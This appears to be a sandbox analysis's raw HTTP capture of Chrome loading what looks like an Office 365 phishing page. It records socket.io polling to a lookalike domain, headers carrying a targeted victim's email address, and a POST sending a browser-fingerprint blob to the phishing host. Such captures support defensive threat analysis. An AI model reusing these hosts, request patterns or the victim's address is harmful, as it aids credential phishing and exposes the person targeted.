                                                        2025-03-27 13:41:43 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:41:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.549776172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:44 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrbOF HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:44 UTC375INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:44 GMT
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e983ca641f9-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.549777172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:44 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrbOF HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:44 UTC843INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:44 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1xW70grSiYPxntb9onwYXdKM6FzNgoBazkFXQpfXMFUaIYk16W4YO75yye2dA91WMyo9oG49ux%2BDJdtTKoXDr2zxF9oAKvLAMQHgb6LqxATZE1UOqwYmjdGyNJzyEd8xibzCvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e9b498f41e1-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83511&min_rtt=83470&rtt_var=17671&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1239&delivery_rate=36560&cwnd=252&unsent_bytes=0&cid=7b62a6a0a12a1ee7&ts=309&x=0"
                                                        2025-03-27 13:41:44 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 63 65 47 6f 41 54 70 6c 52 6b 34 73 41 4f 49 4c 41 41 65 33 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"ceGoATplRk4sAOILAAe3","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.549779172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:45 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: LFQPQHRj3K0Cy0BCzE3u+A==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:41:45 UTC829INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:45 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=12N8ZOMJT1wMdsAcHrIdoKJroyna1T6hWoo%2FxepsMtYzBW1iwTlGdSGfw3UhgSYwtgyGHC7JcrVM%2BoTplGq%2FqV1JqZHAvy9S5sV7DSBr5Pd8NY8gB1jmtdmYJRHGOPdIE7p17Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e9e49b718ea-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84012&min_rtt=83582&rtt_var=18282&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1121&delivery_rate=35997&cwnd=250&unsent_bytes=0&cid=c0db6269752177b0&ts=304&x=0"
                                                        2025-03-27 13:41:45 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:41:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.549780172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:45 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrbdS&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:45 UTC945INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:45 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FGGEvJgVX%2BvzCTeC5ASuBTEniJ0kMssJ4jbqfpQh0Lt2iK6puCukLf%2BK8Q0HYGaTyw89vv8nnnf4SzwhmXczfBdX7iGPnGdSFp%2BWdo%2B4EVzcy8e8zcNcwEVDIfFNMCjrvr6CLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e9e49483354-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83884&min_rtt=83859&rtt_var=17705&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1165&delivery_rate=36436&cwnd=252&unsent_bytes=0&cid=0b3f2296b4ae328a&ts=305&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.549781172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:45 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrbOF HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:45 UTC852INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:45 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1hdNAAvuvR43aBUTl9gG6H6epdnFzYpw4oRvu%2FuPgDdVpeIEqhPf%2B%2BjP%2FU%2Fqzo9msWw3LtrhwH3UwRReFpXpVqSdLmHIM7oPyWn2wx7VvCR1EGK7n55MAVOh%2BWI5sirXvKyCiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e9e5ae3c698-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84726&min_rtt=84694&rtt_var=17918&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=997&delivery_rate=36037&cwnd=252&unsent_bytes=0&cid=5e79264aeafa5b54&ts=303&x=0"
                                                        2025-03-27 13:41:45 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 48 69 6e 62 58 7a 37 67 62 4b 56 52 56 73 78 70 41 41 65 34 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"HinbXz7gbKVRVsxpAAe4","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.549778172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:45 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrbdU&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:45 UTC943INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:45 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9l%2BFb8mAm5n%2BVQF6ci8dDahYqjBpt9Uf9UAJjzelSlazdfSA01%2BKaQYcT%2BcSzil3dOyFiRsy9ZXXBOpaSjiLvX8VFBQmHP9yNbYa64H4BxxEQ2OmMoSrId5OD0Z7S5LL3EQ3jg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e9e5e0d566e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83773&min_rtt=83760&rtt_var=17689&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1164&delivery_rate=36474&cwnd=252&unsent_bytes=0&cid=e5a3a578783442ba&ts=304&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.549782172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:45 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNrbdS&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:45 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:41:46 UTC838INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:46 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyO7LKdI%2BXeR2P7K6k7nNnEUmix9BBXGvvJr5lmwSLgWNrsVoP1a9wVIP3PKh5aKITo6QCcVsUb7yYtPsO7B6KiiV38nVlm%2B%2BTqpzdYUQv6jtuD5dJJuRqQ09nSuRK7xhNsuMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ea30b891a1f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83635&min_rtt=83541&rtt_var=17688&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1348&delivery_rate=36561&cwnd=252&unsent_bytes=0&cid=da2f93cf92c78399&ts=331&x=0"
                                                        2025-03-27 13:41:46 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:41:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.549783172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:45 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrbdU&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:46 UTC841INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:46 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fN1sJB8h5tb4thyHSudxwa9ixnhtF7H1BL4XMILRDThYBB5Ty%2BhIn1TNbOKx63BulVN6na6DAyhGGu4y1Zm29KfaaAPtIfcTY7p6BHGN8I49QNzqkAoiMo7BcLGvsZA79pTyrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ea309e843ec-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83983&min_rtt=83940&rtt_var=17737&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1264&delivery_rate=36405&cwnd=252&unsent_bytes=0&cid=4d77ec5ea1f7fa59&ts=802&x=0"
                                                        2025-03-27 13:41:46 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.549784172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:46 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrbdS&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:46 UTC799INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:46 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtKBD4KDO0cx%2BA0IWXztV5pk%2BcXzz3lXmTv%2BCTiNWsln6zRHUKZ4jGAeusIXrrbwVHI2Fvan4WhrhqJEJ40vycXx1pK5DaIui6nPC%2FUzqO4HZF7hn5LyFUPW1szs6zsQcKtHtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ea62c17c35f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84143&min_rtt=83666&rtt_var=18368&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1022&delivery_rate=35912&cwnd=252&unsent_bytes=0&cid=3f7d52a1bedb906c&ts=306&x=0"
                                                        2025-03-27 13:41:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.549774104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:46 UTC1021OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:46 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:41:46 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:41:46 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
